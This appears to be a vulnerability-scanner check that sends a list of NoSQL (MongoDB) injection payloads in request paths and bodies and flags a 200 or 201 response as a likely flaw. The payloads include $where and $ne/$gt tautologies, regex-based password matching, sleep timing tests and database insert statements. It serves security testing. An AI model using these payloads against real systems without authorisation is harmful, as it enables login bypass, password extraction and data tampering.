metadata:
    language: v1-beta
    name: "NoSQL Injection Detection"
    description: "Checks for NoSQL injection vulnerabilities using various payloads."
    author: "Kaustubh"

define:
    desc = "Potential NoSQL Injection detected"
    issueRemediation = "Review and sanitize user inputs and query logic."

run for each:
    payload = 
        "true, $where: '1 == 1'",
        ", $where: '1 == 1'",
        "$where: '1 == 1'",
        "', $where: '1 == 1'",
        "1, $where: '1 == 1'",
        "{ $ne: 1 }",
        "', $or: [ {}, { 'a':'a' } ], $comment:'successful MongoDB injection'",
        "db.injection.insert({success:1});",
        "db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1) } }",
        "|| 1==1",
        "' && this.password.match(/.*/)//+%00",
        "' && this.passwordzz.match(/.*/)//+%00",
        "'%20%26%26%20this.password.match(/.*/)//+%00",
        "'%20%26%26%20this.passwordzz.match(/.*/)//+%00",
        "{$gt: ''}",
        "{\"$gt\": \"\"}",
        "[$ne]=1",
        "';sleep(5000);",
        "';sleep(5000);'",
        "';sleep(5000);+'",
        "';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);",
        "';return 'a'=='a' && ''=='",
        "\";return(true);var xyz='a",
        "0;return true"

given request then
    send request called check:
        method: "GET"
        replacing path: {payload}
        body: "{base.request.body}{payload}"
    
    # Check the response for NoSQL injection
    if {check.response.status_code} is "200" or {check.response.status_code} is "201" then
        report issue:
            severity: high
            confidence: tentative
            detail: "{desc} via payload: {payload}"
            remediation: {issueRemediation}
    end if
